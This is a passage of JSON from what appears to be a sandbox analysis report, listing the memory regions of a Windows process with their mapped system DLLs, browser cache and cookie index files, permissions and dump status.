"filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791755390976, "type": "region", "version": 1 }, "end_va": 8791755452415, "entry_point": 8791755397552, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_868", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 8791755390976, "timestamp": "00:01:03.526", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", 
"permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 49152, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1294335, "entry_point": 1245184, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat", "id": "region_869", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 1245184, "timestamp": "00:01:03.533", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1343487, "entry_point": 1310720, "filename": "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat", "id": "region_870", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat", "region_type": "memory_mapped_file", "start_va": 1310720, "timestamp": "00:01:03.533", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1441791, "entry_point": 1376256, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat", "id": "region_871", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 1376256, "timestamp": "00:01:03.534", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ 
"untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1703935, "entry_point": 1441792, "filename": "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat", "id": "region_872", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat", "region_type": "memory_mapped_file", "start_va": 1441792, "timestamp": "00:01:03.536", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 1708031, "entry_point": 0, "filename": null, "id": "region_880", "name": "pagefile_0x00000000001a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1703936, "timestamp": "00:01:03.564", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791770071040, "type": "region", "version": 1 }, "end_va": 8791770697727, "entry_point": 8791770078224, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_881", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 8791770071040, "timestamp": "00:01:03.565", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], 
"ref_process_dump": null, "size": 4096, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 2822143, "entry_point": 0, "filename": null, "id": "region_882", "name": "pagefile_0x00000000002b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2818048, "timestamp": "00:01:03.566", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 2887679, "entry_point": 2883584, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_886", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 2883584, "timestamp": "00:01:03.579", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2949120, "type": "region", "version": 1 }, "end_va": 2957311, "entry_point": 0, "filename": null, "id": "region_887", "name": "pagefile_0x00000000002d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2949120, "timestamp": "00:01:03.579", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2048000, "start_va": 8791731339264, "type": "region", "version": 1 }, "end_va": 8791733387263, "entry_point": 8791732963620, "filename": "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "id": "region_888", "name": "comctl32.dll", 
"norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 8791731339264, "timestamp": "00:01:03.580", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 3014656, "type": "region", "version": 1 }, "end_va": 3022847, "entry_point": 0, "filename": null, "id": "region_890", "name": "pagefile_0x00000000002e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3014656, "timestamp": "00:01:03.583", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 2887679, "entry_point": 0, "filename": null, "id": "region_896", "name": "pagefile_0x00000000002c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2883584, "timestamp": "00:01:03.621", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 3088383, "entry_point": 0, "filename": null, "id": "region_898", "name": "pagefile_0x00000000002f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3080192, "timestamp": "00:01:03.708", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ 
"unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 315392, "start_va": 8791770726400, "type": "region", "version": 1 }, "end_va": 8791771041791, "entry_point": 8791770730608, "filename": "\\Windows\\System32\\ws2_32.dll", "id": "region_899", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\system32\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 8791770726400, "timestamp": "00:01:03.708", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 8791791501312, "type": "region", "version": 1 }, "end_va": 8791791534079, "entry_point": 8791791506692, "filename": "\\Windows\\System32\\nsi.dll", "id": "region_900", "name": "nsi.dll", "norm_filename": "c:\\windows\\system32\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 8791791501312, "timestamp": "00:01:03.709", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000901-addr_0x00000000029b0000-size_0x0000000000220000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_141", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2228224, "start_va": 43712512, "type": "region", "version": 1 }, "end_va": 45940735, "entry_point": 0, "filename": null, "id": "region_901", "name": "private_0x00000000029b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 43712512, "timestamp": "00:01:03.711", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", 
"executable" ], "ref_process_dump": null, "size": 372736, "start_va": 8791746019328, "type": "region", "version": 1 }, "end_va": 8791746392063, "entry_point": 8791746046272, "filename": "\\Windows\\System32\\dnsapi.dll", "id": "region_902", "name": "dnsapi.dll", "norm_filename": "c:\\windows\\system32\\dnsapi.dll", "region_type": "memory_mapped_file", "start_va": 8791746019328, "timestamp": "00:01:03.716", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000903-addr_0x0000000002bd0000-size_0x0000000000200000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_142", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2097152, "start_va": 45940736, "type": "region", "version": 1 }, "end_va": 48037887, "entry_point": 0, "filename": null, "id": "region_903", "name": "private_0x0000000002bd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 45940736, "timestamp": "00:01:03.718", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 8791728717824, "type": "region", "version": 1 }, "end_va": 8791728877567, "entry_point": 8791728756924, "filename": "\\Windows\\System32\\IPHLPAPI.DLL", "id": "region_904", "name": "iphlpapi.dll", "norm_filename": "c:\\windows\\system32\\iphlpapi.dll", "region_type": "memory_mapped_file", "start_va": 8791728717824, "timestamp": "00:01:03.718", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 8791728652288, "type": "region", 
"version": 1 }, "end_va": 8791728697343, "entry_point": 8791728656792, "filename": "\\Windows\\System32\\winnsi.dll", "id": "region_905", "name": "winnsi.dll", "norm_filename": "c:\\windows\\system32\\winnsi.dll", "region_type": "memory_mapped_file", "start_va": 8791728652288, "timestamp": "00:01:03.720", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 35454976, "type": "region", "version": 1 }, "end_va": 36503551, "entry_point": 0, "filename": null, "id": "region_906", "name": "private_0x00000000021d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35454976, "timestamp": "00:01:03.723", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 36765696, "type": "region", "version": 1 }, "end_va": 37289983, "entry_point": 0, "filename": null, "id": "region_907", "name": "private_0x0000000002310000", "norm_filename": null, "region_type": "private_memory", "start_va": 36765696, "timestamp": "00:01:03.724", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092866560, "type": "region", "version": 1 }, "end_va": 8796092874751, "entry_point": 0, "filename": null, "id": "region_908", "name": "private_0x000007fffffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092866560, "timestamp": 
"00:01:03.724", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 401408, "start_va": 8791581523968, "type": "region", "version": 1 }, "end_va": 8791581925375, "entry_point": 8791581528472, "filename": "\\Windows\\System32\\rasapi32.dll", "id": "region_909", "name": "rasapi32.dll", "norm_filename": "c:\\windows\\system32\\rasapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791581523968, "timestamp": "00:01:03.725", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 8791581392896, "type": "region", "version": 1 }, "end_va": 8791581507583, "entry_point": 8791581397408, "filename": "\\Windows\\System32\\rasman.dll", "id": "region_910", "name": "rasman.dll", "norm_filename": "c:\\windows\\system32\\rasman.dll", "region_type": "memory_mapped_file", "start_va": 8791581392896, "timestamp": "00:01:03.726", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 8791711809536, "type": "region", "version": 1 }, "end_va": 8791711879167, "entry_point": 8791711814848, "filename": "\\Windows\\System32\\rtutils.dll", "id": "region_911", "name": "rtutils.dll", "norm_filename": "c:\\windows\\system32\\rtutils.dll", "region_type": "memory_mapped_file", "start_va": 8791711809536, "timestamp": "00:01:03.728", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created 
because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 44171264, "type": "region", "version": 1 }, "end_va": 45219839, "entry_point": 0, "filename": null, "id": "region_921", "name": "private_0x0000000002a20000", "norm_filename": null, "region_type": "private_memory", "start_va": 44171264, "timestamp": "00:01:03.759", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 45416448, "type": "region", "version": 1 }, "end_va": 45940735, "entry_point": 0, "filename": null, "id": "region_922", "name": "private_0x0000000002b50000", "norm_filename": null, "region_type": "private_memory", "start_va": 45416448, "timestamp": "00:01:03.759", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092850176, "type": "region", "version": 1 }, "end_va": 8796092858367, "entry_point": 0, "filename": null, "id": "region_923", "name": "private_0x000007fffffd6000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092850176, "timestamp": "00:01:03.759", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000924-addr_0x0000000000300000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_146", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 3145728, "type": "region", "version": 1 }, 
"end_va": 3149823, "entry_point": 0, "filename": null, "id": "region_924", "name": "private_0x0000000000300000", "norm_filename": null, "region_type": "private_memory", "start_va": 3145728, "timestamp": "00:01:03.766", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3149823, "entry_point": 0, "filename": null, "id": "region_925", "name": "pagefile_0x0000000000300000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3145728, "timestamp": "00:01:03.766", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 8791636770816, "type": "region", "version": 1 }, "end_va": 8791636807679, "entry_point": 8791636776116, "filename": "\\Windows\\System32\\SensApi.dll", "id": "region_926", "name": "sensapi.dll", "norm_filename": "c:\\windows\\system32\\sensapi.dll", "region_type": "memory_mapped_file", "start_va": 8791636770816, "timestamp": "00:01:03.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 48693248, "type": "region", "version": 1 }, "end_va": 49741823, "entry_point": 0, "filename": null, "id": "region_927", "name": "private_0x0000000002e70000", "norm_filename": null, "region_type": "private_memory", "start_va": 48693248, "timestamp": "00:01:03.782", "type": "region", "version": 1 }, { "dump": { 
"filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 8791730356224, "type": "region", "version": 1 }, "end_va": 8791730442239, "entry_point": 8791730381016, "filename": "\\Windows\\System32\\nlaapi.dll", "id": "region_928", "name": "nlaapi.dll", "norm_filename": "c:\\windows\\system32\\nlaapi.dll", "region_type": "memory_mapped_file", "start_va": 8791730356224, "timestamp": "00:01:03.782", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092841984, "type": "region", "version": 1 }, "end_va": 8796092850175, "entry_point": 0, "filename": null, "id": "region_929", "name": "private_0x000007fffffd4000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092841984, "timestamp": "00:01:03.783", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000930-addr_0x0000000000310000-size_0x0000000000060000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_147", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 393216, "start_va": 3211264, "type": "region", "version": 1 }, "end_va": 3604479, "entry_point": 0, "filename": null, "id": "region_930", "name": "private_0x0000000000310000", "norm_filename": null, "region_type": "private_memory", "start_va": 3211264, "timestamp": "00:01:03.784", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000931-addr_0x0000000001f00000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region 
dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_148", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 32505856, "type": "region", "version": 1 }, "end_va": 33554431, "entry_point": 0, "filename": null, "id": "region_931", "name": "private_0x0000000001f00000", "norm_filename": null, "region_type": "private_memory", "start_va": 32505856, "timestamp": "00:01:03.784", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000932-addr_0x0000000001f00000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_149", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 32505856, "type": "region", "version": 1 }, "end_va": 33030143, "entry_point": 0, "filename": null, "id": "region_932", "name": "private_0x0000000001f00000", "norm_filename": null, "region_type": "private_memory", "start_va": 32505856, "timestamp": "00:01:03.786", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 33488896, "type": "region", "version": 1 }, "end_va": 33554431, "entry_point": 0, "filename": null, "id": "region_933", "name": "private_0x0000000001ff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 33488896, "timestamp": "00:01:03.786", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 
8791603871744, "type": "region", "version": 1 }, "end_va": 8791603904511, "entry_point": 8791603876884, "filename": "\\Windows\\System32\\rasadhlp.dll", "id": "region_956", "name": "rasadhlp.dll", "norm_filename": "c:\\windows\\system32\\rasadhlp.dll", "region_type": "memory_mapped_file", "start_va": 8791603871744, "timestamp": "00:01:03.829", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 50855936, "type": "region", "version": 1 }, "end_va": 51904511, "entry_point": 0, "filename": null, "id": "region_957", "name": "private_0x0000000003080000", "norm_filename": null, "region_type": "private_memory", "start_va": 50855936, "timestamp": "00:01:03.834", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092686336, "type": "region", "version": 1 }, "end_va": 8796092694527, "entry_point": 0, "filename": null, "id": "region_958", "name": "private_0x000007fffffae000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092686336, "timestamp": "00:01:03.835", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3211264, "type": "region", "version": 1 }, "end_va": 3473407, "entry_point": 0, "filename": null, "id": "region_959", "name": "private_0x0000000000310000", "norm_filename": null, "region_type": "private_memory", 
"start_va": 3211264, "timestamp": "00:01:03.836", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 3538944, "type": "region", "version": 1 }, "end_va": 3604479, "entry_point": 0, "filename": null, "id": "region_960", "name": "private_0x0000000000360000", "norm_filename": null, "region_type": "private_memory", "start_va": 3538944, "timestamp": "00:01:03.837", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 46530560, "type": "region", "version": 1 }, "end_va": 47054847, "entry_point": 0, "filename": null, "id": "region_973", "name": "private_0x0000000002c60000", "norm_filename": null, "region_type": "private_memory", "start_va": 46530560, "timestamp": "00:01:03.936", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 47513600, "type": "region", "version": 1 }, "end_va": 48037887, "entry_point": 0, "filename": null, "id": "region_974", "name": "private_0x0000000002d50000", "norm_filename": null, "region_type": "private_memory", "start_va": 47513600, "timestamp": "00:01:03.936", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": 
null, "size": 1048576, "start_va": 53477376, "type": "region", "version": 1 }, "end_va": 54525951, "entry_point": 0, "filename": null, "id": "region_975", "name": "private_0x0000000003300000", "norm_filename": null, "region_type": "private_memory", "start_va": 53477376, "timestamp": "00:01:03.937", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791592992768, "type": "region", "version": 1 }, "end_va": 8791593041919, "entry_point": 8791593017388, "filename": "\\Windows\\System32\\npmproxy.dll", "id": "region_976", "name": "npmproxy.dll", "norm_filename": "c:\\windows\\system32\\npmproxy.dll", "region_type": "memory_mapped_file", "start_va": 8791592992768, "timestamp": "00:01:03.937", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 475136, "start_va": 8791636967424, "type": "region", "version": 1 }, "end_va": 8791637442559, "entry_point": 8791636993776, "filename": "\\Windows\\System32\\netprofm.dll", "id": "region_977", "name": "netprofm.dll", "norm_filename": "c:\\windows\\system32\\netprofm.dll", "region_type": "memory_mapped_file", "start_va": 8791636967424, "timestamp": "00:01:03.938", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 8791713710080, "type": "region", "version": 1 }, "end_va": 8791713755135, "entry_point": 8791713714912, "filename": "\\Windows\\System32\\winrnr.dll", "id": "region_978", "name": "winrnr.dll", "norm_filename": 
"c:\\windows\\system32\\winrnr.dll", "region_type": "memory_mapped_file", "start_va": 8791713710080, "timestamp": "00:01:03.938", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 8791713775616, "type": "region", "version": 1 }, "end_va": 8791713878015, "entry_point": 8791713781628, "filename": "\\Windows\\System32\\pnrpnsp.dll", "id": "region_979", "name": "pnrpnsp.dll", "norm_filename": "c:\\windows\\system32\\pnrpnsp.dll", "region_type": "memory_mapped_file", "start_va": 8791713775616, "timestamp": "00:01:03.939", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 8791713906688, "type": "region", "version": 1 }, "end_va": 8791713992703, "entry_point": 8791713911456, "filename": "\\Windows\\System32\\NapiNSP.dll", "id": "region_980", "name": "napinsp.dll", "norm_filename": "c:\\windows\\system32\\napinsp.dll", "region_type": "memory_mapped_file", "start_va": 8791713906688, "timestamp": "00:01:03.939", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 339968, "start_va": 8791727276032, "type": "region", "version": 1 }, "end_va": 8791727615999, "entry_point": 8791727287192, "filename": "\\Windows\\System32\\FWPUCLNT.DLL", "id": "region_981", "name": "fwpuclnt.dll", "norm_filename": "c:\\windows\\system32\\fwpuclnt.dll", "region_type": "memory_mapped_file", "start_va": 8791727276032, "timestamp": "00:01:03.940", "type": "region", "version": 1 }, { "dump": { 
"filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 8791741300736, "type": "region", "version": 1 }, "end_va": 8791741329407, "entry_point": 8791741306032, "filename": "\\Windows\\System32\\WSHTCPIP.DLL", "id": "region_982", "name": "wshtcpip.dll", "norm_filename": "c:\\windows\\system32\\wshtcpip.dll", "region_type": "memory_mapped_file", "start_va": 8791741300736, "timestamp": "00:01:03.940", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 290816, "start_va": 8791744839680, "type": "region", "version": 1 }, "end_va": 8791745130495, "entry_point": 8791744843876, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_983", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 8791744839680, "timestamp": "00:01:03.941", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 8791747526656, "type": "region", "version": 1 }, "end_va": 8791747555327, "entry_point": 8791747531820, "filename": "\\Windows\\System32\\wship6.dll", "id": "region_984", "name": "wship6.dll", "norm_filename": "c:\\windows\\system32\\wship6.dll", "region_type": "memory_mapped_file", "start_va": 8791747526656, "timestamp": "00:01:03.941", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": 
